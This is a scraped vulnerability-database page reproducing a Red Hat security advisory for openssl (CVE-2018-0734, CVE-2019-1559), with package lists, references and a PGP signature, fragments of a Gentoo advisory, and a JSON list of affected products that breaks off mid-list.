[ 1 ] CVE-2018-5407 https://nvd.nist.gov/vuln/detail/CVE-2018-5407 [ 2 ] CVE-2019-1559 https://nvd.nist.gov/vuln/detail/CVE-2019-1559

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

https://security.gentoo.org/glsa/201903-10

Concerns?

License

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5 . Description:

Before applying this update, make sure all previously released errata relevant to your system have been applied. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Moderate: openssl security and bug fix update Advisory ID: RHSA-2019:2304-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2019:2304 Issue date: 2019-08-06 CVE Names: CVE-2018-0734 CVE-2019-1559 ==================================================================== 1. Summary:

An update for openssl is now available for Red Hat Enterprise Linux 7.

Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

Description:

OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.

Security Fix(es):

openssl: 0-byte record padding oracle (CVE-2019-1559)
openssl: timing side channel attack in the DSA signature algorithm (CVE-2018-0734)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.7 Release Notes linked from the References section.

Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.

Bugs fixed (https://bugzilla.redhat.com/):

1644364 - CVE-2018-0734 openssl: timing side channel attack in the DSA signature algorithm 1649568 - openssl: microarchitectural and timing side channel padding oracle attack against RSA 1683804 - CVE-2019-1559 openssl: 0-byte record padding oracle

Package List:

Red Hat Enterprise Linux Client (v. 7):

Source: openssl-1.0.2k-19.el7.src.rpm

x86_64: openssl-1.0.2k-19.el7.x86_64.rpm openssl-debuginfo-1.0.2k-19.el7.i686.rpm openssl-debuginfo-1.0.2k-19.el7.x86_64.rpm openssl-libs-1.0.2k-19.el7.i686.rpm openssl-libs-1.0.2k-19.el7.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64: openssl-debuginfo-1.0.2k-19.el7.i686.rpm openssl-debuginfo-1.0.2k-19.el7.x86_64.rpm openssl-devel-1.0.2k-19.el7.i686.rpm openssl-devel-1.0.2k-19.el7.x86_64.rpm openssl-perl-1.0.2k-19.el7.x86_64.rpm openssl-static-1.0.2k-19.el7.i686.rpm openssl-static-1.0.2k-19.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source: openssl-1.0.2k-19.el7.src.rpm

x86_64: openssl-1.0.2k-19.el7.x86_64.rpm openssl-debuginfo-1.0.2k-19.el7.i686.rpm openssl-debuginfo-1.0.2k-19.el7.x86_64.rpm openssl-libs-1.0.2k-19.el7.i686.rpm openssl-libs-1.0.2k-19.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

Red Hat Enterprise Linux Server (v. 7):

Source: openssl-1.0.2k-19.el7.src.rpm

ppc64: openssl-1.0.2k-19.el7.ppc64.rpm openssl-debuginfo-1.0.2k-19.el7.ppc.rpm openssl-debuginfo-1.0.2k-19.el7.ppc64.rpm openssl-devel-1.0.2k-19.el7.ppc.rpm openssl-devel-1.0.2k-19.el7.ppc64.rpm openssl-libs-1.0.2k-19.el7.ppc.rpm openssl-libs-1.0.2k-19.el7.ppc64.rpm

ppc64le: openssl-1.0.2k-19.el7.ppc64le.rpm openssl-debuginfo-1.0.2k-19.el7.ppc64le.rpm openssl-devel-1.0.2k-19.el7.ppc64le.rpm openssl-libs-1.0.2k-19.el7.ppc64le.rpm

s390x: openssl-1.0.2k-19.el7.s390x.rpm openssl-debuginfo-1.0.2k-19.el7.s390.rpm openssl-debuginfo-1.0.2k-19.el7.s390x.rpm openssl-devel-1.0.2k-19.el7.s390.rpm openssl-devel-1.0.2k-19.el7.s390x.rpm openssl-libs-1.0.2k-19.el7.s390.rpm openssl-libs-1.0.2k-19.el7.s390x.rpm

x86_64: openssl-1.0.2k-19.el7.x86_64.rpm openssl-debuginfo-1.0.2k-19.el7.i686.rpm openssl-debuginfo-1.0.2k-19.el7.x86_64.rpm openssl-devel-1.0.2k-19.el7.i686.rpm openssl-devel-1.0.2k-19.el7.x86_64.rpm openssl-libs-1.0.2k-19.el7.i686.rpm openssl-libs-1.0.2k-19.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64: openssl-debuginfo-1.0.2k-19.el7.ppc.rpm openssl-debuginfo-1.0.2k-19.el7.ppc64.rpm openssl-perl-1.0.2k-19.el7.ppc64.rpm openssl-static-1.0.2k-19.el7.ppc.rpm openssl-static-1.0.2k-19.el7.ppc64.rpm

ppc64le: openssl-debuginfo-1.0.2k-19.el7.ppc64le.rpm openssl-perl-1.0.2k-19.el7.ppc64le.rpm openssl-static-1.0.2k-19.el7.ppc64le.rpm

s390x: openssl-debuginfo-1.0.2k-19.el7.s390.rpm openssl-debuginfo-1.0.2k-19.el7.s390x.rpm openssl-perl-1.0.2k-19.el7.s390x.rpm openssl-static-1.0.2k-19.el7.s390.rpm openssl-static-1.0.2k-19.el7.s390x.rpm

x86_64: openssl-debuginfo-1.0.2k-19.el7.i686.rpm openssl-debuginfo-1.0.2k-19.el7.x86_64.rpm openssl-perl-1.0.2k-19.el7.x86_64.rpm openssl-static-1.0.2k-19.el7.i686.rpm openssl-static-1.0.2k-19.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source: openssl-1.0.2k-19.el7.src.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

References:

https://access.redhat.com/security/cve/CVE-2018-0734 https://access.redhat.com/security/cve/CVE-2019-1559 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.7_release_notes/index

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iQIVAwUBXUl3otzjgjWX9erEAQgZQQ//XNcjRJGLVmjAzbVGiwxEqfFUvDVNiu97 fW0vLXuV9TnQTveOVqOAWmmMv2iShkVIRPDvzlOfUsYrrDEYHKr0N38R/fhDEZsM WQrJh54WK9IjEGNevLTCePKMhVuII1WnHrLDwZ6hxYGdcap/sJrf+N428b5LvHbM B39vWl3vqJYXoiI5dmIYL8ko2SfLms5Cg+dR0hLrNohf9gK2La+jhWb/j2xw6X6q /LXw5+hi/G+USbnNFfjt9G0fNjMMZRX2bukUvY6UWJRYTOXpIUOFqqp5w9zgM7tZ uX7TMTC9xe6te4mBCAFDdt+kYYLYSHfSkFlFq+S7V0MY8DmnIzqBJE4lJIDTVp9F JbrMIPs9G5jdnzPUKZw/gH9WLgka8Q8AYI+KA2xSxFX9VZ20Z+EDDC9/4uwj3i0A gLeIB68OwD70jn4sjuQqizr7TCviQhTUoKVd/mTBAxSEFZLcE8Sy/BEYxLPm81z0 veL16l6pmfg9uLac4V576ImfYNWlBEnJspA5E9K5CqQRPuZpCQFov7/D17Qm8v/x IcVKUaXiGquBwzHmIsD5lTCpl7CrGoU1PfNJ6Y/4xrVFOh1DLA4y6nnfysyO9eZx zBfuYS2VmfIq/tp1CjagI/DmJC4ezXeE4Phq9jm0EBASXtnLzVmc5j7kkqWjCcfm BtpJTAdr1kE=7kKR -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

Show details on source website

JSON

To clipboard

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "big-ip global traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2"
      },
      {
        "_id": null,
        "model": "communications session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.0.0"
      },
      {
        "_id": null,
        "model": "big-ip domain name system",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "_id": null,
        "model": "big-ip webaccelerator",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.1.0"
      },
      {
        "_id": null,
        "model": "big-ip edge gateway",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2"
      },
      {
        "_id": null,
        "model": "a320",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "_id": null,
        "model": "big-ip local traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2"
      },
      {
        "_id": null,
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "_id": null,
        "model": "jd edwards world security",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "a9.4"
      },
      {
        "_id": null,
        "model": "big-ip fraud protection service",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.1.0"
      },
      {
        "_id": null,
        "model": "communications diameter signaling router",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.2"
      },
      {
        "_id": null,
        "model": "service processor",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "_id": null,
        "model": "big-ip access policy manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2"
      },
      {
        "_id": null,
        "model": "big-ip domain name system",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3"
      },
      {
        "_id": null,
        "model": "communications diameter signaling router",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.0.0"
      },
      {
        "_id": null,
        "model": "big-ip advanced firewall manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2"
      },
      {
        "_id": null,
        "model": "node.js",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "6.0.0"
      },
      {
        "_id": null,
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "_id": null,
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "_id": null,
        "model": "node.js",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "6.17.0"
      },
      {
        "_id": null,
        "model": "snapprotect",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "data exchange layer",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "mcafee",
        "version": "6.0.0"
      },
      {
        "_id": null,
        "model": "big-ip application acceleration manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.1.0"
      },
      {
        "_id": null,
        "model": "big-ip analytics",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3"
      },
      {
        "_id": null,
        "model": "node.js",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "8.15.1"
      },
      {
        "_id": null,
        "model": "communications diameter signaling router",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.1"
      },
      {
        "_id": null,
        "model": "clustered data ontap antivirus connector",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "_id": null,
        "model": "big-ip global traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.1.0"
      },
      {
        "_id": null,
        "model": "big-ip link controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2"
      },
      {
        "_id": null,
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "_id": null,
        "model": "big-ip application security manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5"
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.04"
      },
      {
        "_id": null,
        "model": "big-ip edge gateway",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.1.0"
      },
      {
        "_id": null,
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "_id": null,
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "15.0"
      },
      {
        "_id": null,
        "model": "communications session router",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.2"
      },
      {
        "_id": null,
        "model": "big-ip local traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.1.0"
      },
      {
        "_id": null,
        "model": "fas2720",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "mysql",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.7.0"
      },
      {
        "_id": null,
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "_id": null,
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "_id": null,
        "model": "big-ip access policy manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.1.0"
      },
      {
        "_id": null,
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "_id": null,
        "model": "big-ip advanced firewall manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.1.0"
      },
      {
        "_id": null,
        "model": "communications diameter signaling router",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.4"
      },
      {
        "_id": null,
        "model": "enterprise manager base platform",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "12.1.0.5.0"
      },
      {
        "_id": null,
        "model": "enterprise manager base platform",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "13.3.0.0.0"
      },
      {
        "_id": null,
        "model": "nessus",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "tenable",
        "version": "8.2.3"
      },
      {
        "_id": null,
        "model": "oncommand unified manager core package",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "_id": null,
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "_id": null,
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "_id": null,
        "model": "big-ip domain name system",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5"
      },
      {
        "_id": null,
        "model": "communications session router",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.1"
      },
      {
        "_id": null,
        "model": "mysql enterprise monitor",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.0.14"
      },
      {
        "_id": null,
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "_id": null,
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "_id": null,
        "model": "data exchange layer",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "mcafee",
        "version": "4.0.0"
      },
      {
        "_id": null,
        "model": "peoplesoft enterprise peopletools",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.56"
      },
      {
        "_id": null,
        "model": "big-ip webaccelerator",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3"
      },
      {
        "_id": null,
        "model": "big-ip link controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.1.0"
      },
      {
        "_id": null,
        "model": "peoplesoft enterprise peopletools",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.57"
      },
      {
        "_id": null,
        "model": "enterprise manager ops center",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "12.4.0"
      },
      {
        "_id": null,
        "model": "traffix signaling delivery controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "4.4.0"
      },
      {
        "_id": null,
        "model": "big-ip analytics",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5"
      },
      {
        "_id": null,
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "_id": null,
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "_id": null,
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "_id": null,
        "model": "big-ip fraud protection service",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3"
      },
      {
        "_id": null,
        "model": "jboss enterprise web server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "5.0.0"
      },
      {
        "_id": null,
        "model": "big-ip application acceleration manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5"
      },
      {
        "_id": null,
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "_id": null,
        "model": "oncommand insight",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "communications unified session manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.2.5"
      },
      {
        "_id": null,
        "model": "mysql enterprise monitor",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.0.0"
      },
      {
        "_id": null,
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "big-ip global traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5"
      },
      {
        "_id": null,
        "model": "a800",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "_id": null,
        "model": "mysql",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.7.25"
      },
      {
        "_id": null,
        "model": "smi-s provider",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "30"
      },
      {
        "_id": null,
        "model": "virtualization host",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "4.0"
      },
      {
        "_id": null,
        "model": "openssl",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2"
      },
      {
        "_id": null,
        "model": "big-ip domain name system",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "_id": null,
        "model": "big-ip local traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5"
      },
      {
        "_id": null,
        "model": "snapdrive",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "big-ip application acceleration manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3"
      },
      {
        "_id": null,
        "model": "mysql workbench",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.0.16"
      },
      {
        "_id": null,
        "model": "openssl",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2r"
      },
      {
        "_id": null,
        "model": "altavault",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "threat intelligence exchange server",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "mcafee",
        "version": "2.0.0"
      },
      {
        "_id": null,
        "model": "big-ip global traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3"
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "_id": null,
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "_id": null,
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "_id": null,
        "model": "mysql",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.0.15"
      },
      {
        "_id": null,
        "model": "pan-os",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "paloaltonetworks",
        "version": "9.0.0"
      },
      {
        "_id": null,
        "model": "pan-os",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "paloaltonetworks",
        "version": "8.0.20"
      },
      {
        "_id": null,
        "model": "communications session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.3"
      },
      {
        "_id": null,
        "model": "big-ip edge gateway",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3"
      },
      {
        "_id": null,
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "_id": null,
        "model": "ontap select deploy",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "big-ip local traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3"
      },
      {
        "_id": null,
        "model": "agent",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "mcafee",
        "version": "5.6.0"
      },
      {
        "_id": null,
        "model": "big-ip policy enforcement manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2"
      },
      {
        "_id": null,
        "model": "big-iq centralized management",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "7.0.0"
      },
      {
        "_id": null,
        "model": "api gateway",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "11.1.2.4.0"
      },
      {
        "_id": null,
        "model": "pan-os",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "paloaltonetworks",
        "version": "9.0.2"
      },
      {
        "_id": null,
        "model": "big-ip access policy manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3"
      },
      {
        "_id": null,
        "model": "big-ip webaccelerator",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5"
      },
      {
        "_id": null,
        "model": "fas2750",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "node.js",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "8.9.0"
      },
      {
        "_id": null,
        "model": "big-ip advanced firewall manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3"
      },
      {
        "_id": null,
        "model": "active iq unified manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "9.5"
      },
      {
        "_id": null,
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "_id": null,
        "model": "communications diameter signaling router",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.3"
      },
      {
        "_id": null,
        "model": "big-ip link controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5"
      },
      {
        "_id": null,
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "_id": null,
        "model": "big-ip fraud protection service",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.5"
      },
      {
        "_id": null,
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "_id": null,
        "model": "node.js",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "8.0.0"
      },
      {
        "_id": null,
        "model": "big-ip application security manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.2"
      },
      {
        "_id": null,
        "model": "web gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "mcafee",
        "version": "7.0.0"
      },
      {
        "_id": null,
        "model": "node.js",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "8.8.1"
      },
      {
        "_id": null,
        "model": "active iq unified manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "7.3"
      },
      {
        "_id": null,
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "_id": null,
        "model": "snapcenter",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "big-ip link controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.3"
      },
      {
        "_id": null,
        "model": "big-iq centralized management",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "6.1.0"
      },
      {
        "_id": null,
        "model": "business intelligence",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "11.1.1.9.0"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "_id": null,
        "model": "secure global desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.4"
      },
      {
        "_id": null,
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.0.0"
      },
      {
        "_id": null,
        "model": "big-ip policy enforcement manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.1.0"
      },
      {
        "_id": null,
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "_id": null,
        "model": "oncommand workflow automation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "_id": null,
        "model": "steelstore cloud integrated storage",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "mysql enterprise monitor",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "4.0.8"
      },
      {
        "_id": null,
        "model": "peoplesoft enterprise peopletools",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.55"
      },
      {
        "_id": null,
        "model": "storagegrid",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "9.0.0"
      },
      {
        "_id": null,
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "_id": null,
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "42.3"
      },
      {
        "_id": null,
        "model": "c190",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
